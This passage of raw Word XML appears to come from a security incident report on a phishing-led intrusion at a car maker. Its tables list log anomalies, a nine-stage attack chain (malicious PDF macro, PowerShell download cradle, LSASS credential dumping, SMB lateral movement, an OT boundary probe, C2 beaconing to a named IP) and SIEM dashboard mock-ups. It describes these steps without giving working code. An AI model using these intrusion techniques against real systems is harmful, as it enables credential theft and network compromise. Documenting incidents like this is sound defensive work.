                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">+392%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Cross-VLAN connections / user</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0 (VLAN 20 users)</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FF6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">14 attempts</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FF6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">anomalous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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File opens / session (R&amp;D FS)</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~30–80</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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">1,247</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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">+1,559%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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LSASS access events / day</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0 (non-system)</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FF6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">1 (procdump.exe)</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FF6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Logon hours — SVC-CAD-SYNC01</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06:00–20:00 GMT</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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">02:41 GMT</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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">off-hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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OT boundary traffic (VLAN20&gt;30)</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0 (blocked)</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FF6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">3 SYN packets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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FF6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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External DNS queries / host/day</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~40–120</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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">847</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">+607%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A2A" w:sz="10" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A2A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Security Incident Identification — INC-JLR-2026-0312</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Incident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991B1B" w:sz="1"/>
              <w:left w:val="single" w:color="991B1B" w:sz="1"/>
              <w:bottom w:val="single" w:color="991B1B" w:sz="1"/>
              <w:right w:val="single" w:color="991B1B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="991B1B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">INCIDENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="991B1B" w:sz="1"/>
              <w:left w:val="single" w:color="991B1B" w:sz="1"/>
              <w:bottom w:val="single" w:color="991B1B" w:sz="1"/>
              <w:right w:val="single" w:color="991B1B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEE2E2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">INC-JLR-2026-0312  |  P1 CRITICAL  |  18 March 2026 02:41 UTC  |  Credential-Based Lateral Movement — OT Boundary Probe  |  Status: CLOSED / CONTAINED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Incident ID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INC-JLR-2026-0312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Priority / Severity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P1 — Critical (NIST SP 800-61r2 Category: Unauthorized Access + Lateral Movement)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Detection Time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2026-03-18T02:41:07Z (Sentinel CORR-055 + CrowdStrike Falcon alert)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Containment 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2026-03-18T06:58:22Z (4 hours 17 minutes from detection to full containment)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Affected User (initial)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jthomas — James Thomas, Senior R&amp;D CAD Engineer, VLAN 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Compromised Account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SVC-CAD-SYNC01 — Domain service account (CAD file synchronization service)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Affected Hosts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JLR-ENG-WS-047 (VLAN 20 workstation)  |  JLR-ENG-WS-012 (VLAN 20 — lateral)  |  FS-RD-COV-01 (R&amp;D File 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Attack Vector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Spear-phishing email &gt; Malicious PDF &gt; Credential harvesting tool &gt; Service account abuse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Attempted Target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VLAN 30 OT boundary (Siemens MES gateway — 10.30.0.1)  — NOT BREACHED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Data at Risk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Electric Range Rover BMS firmware repository (VLAN 20 file server) — access confirmed, exfil unconfirmed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Incident Handler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JLR SOC Tier 2 Analyst + Incident Response Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Attack Chain Reconstruction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-incident forensic analysis and log correlation established the following attack chain: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760"/>
        <w:gridCol w:w="2800"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Time (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="376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Activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Evidence Source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2D2D2D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1 — Initial Access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02:03:14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Phishing email delivered to jthomas@jlr.com containing PDF (JLR_Supplier_Invoice_March.pdf) with embedded macro calling out to attacker C2 at 185.234.219.47</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M365 Defender email trace; Darktrace DNS anomaly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2D2D2D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2 — Execution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02:11:52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PDF opened by jthomas on JLR-ENG-WS-047; macro executed cmd.exe spawning PowerShell download cradle; payload dropped to %APPDATA%\svcupd.exe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CrowdStrike Falcon — Process Tree alert; Sysmon Event ID 1</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991B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3 — Credential Theft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02:17:33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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svcupd.exe accessed LSASS memory (procdump technique); credentials of SVC-CAD-SYNC01 harvested from LSASS process memory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CrowdStrike — LSASS alert; Sysmon Event ID 10 (ProcessAccess)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2D2D2D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4 — Lateral Movement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02:28:47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Attacker used SVC-CAD-SYNC01 credentials to authenticate to JLR-ENG-WS-012 (VLAN 20) via SMB/CIFS; remote service created on WS-012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Sentinel CORR-078; AD Event ID 4624 / 4648 / 7045</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2D2D2D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5 — Discovery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02:33:19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Net commands and LDAP queries from WS-012 to enumerate AD groups, domain controllers, and OT-connected hosts; 1,247 file open events on FS-RD-COV-01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Sysmon Event ID 3; CORR-091 file enumeration alert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991B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6 — OT Probe Attempt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02:40:51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3 TCP SYN packets from JLR-ENG-WS-012 (10.20.1.47) to Siemens MES gateway (10.30.0.1:102 — S7 Comm port); blocked by NGFW inter-VLAN rule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Palo Alto NGFW deny log; Claroty OT alert; Sentinel CORR-112</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2D2D2D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7 — C2 Beaconing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02:41:07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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svcupd.exe sending periodic HTTP POST to 185.234.219.47:443 (TLS) at 60-second intervals; 847 DNS queries for subdomain-randomized C2 domains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Darktrace CORR-007; DNS log anomaly; Sentinel alert fired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2D6A4F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8 — 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02:41:07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Sentinel CORR-055 (LSASS) + CORR-112 (OT probe) + CORR-007 (Darktrace beaconing) generated P1 incident — SOC pager activated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Microsoft Sentinel INC-JLR-2026-0312 created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2D6A4F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">9 — Containment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02:58–06:58</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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SOC isolation of affected hosts, service account disable, C2 IP block, VLAN 99 quarantine, forensic collection — full containment achieved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SOC incident log; Sentinel playbook execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A2A" w:sz="10" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A2A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Log Evidence and Alert Documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Screenshot 1 — Microsoft Sentinel: P1 Incident Alert Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following SIEM dashboard view represents the Microsoft Sentinel incident queue at 02:42 UTC, immediately after INC-JLR-2026-0312 was auto-generated by correlated alert rules. This constitutes the primary detection artefact for the incident.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2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A3A2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFE066"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[ MICROSOFT SENTINEL — INCIDENT QUEUE  |  JLR COVENTRY SOC  |  2026-03-18 02:42 UTC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2D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">INC ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">TITLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SEVERITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">STATUS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">ALERTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">ENTITIES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">INC-JLR-2026-0312</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">P1: LSASS Access+OT Probe+C2 Beaconing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">NEW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">3 hosts 2 accts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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FFA07A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">INC-JLR-2026-0308</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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FFA07A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Brute-force — Supplier VPN VLAN 40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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FFA07A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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FFA07A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ACTIVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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FFA07A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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FFA07A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">1 host 1 acct</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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INC-JLR-2026-0301</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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Unusual outbound — Connected Vehicle VLAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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CLOSED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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1 host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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INC-JLR-2026-0289</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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Failed MFA — Executive Accounts x4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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CLOSED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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4 accts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Screenshot 2 — Sentinel Incident Detail: INC-JLR-2026-0312</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2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A3A2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFE066"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[ SENTINEL INCIDENT DETAIL — INC-JLR-2026-0312  |  P1 CRITICAL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D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
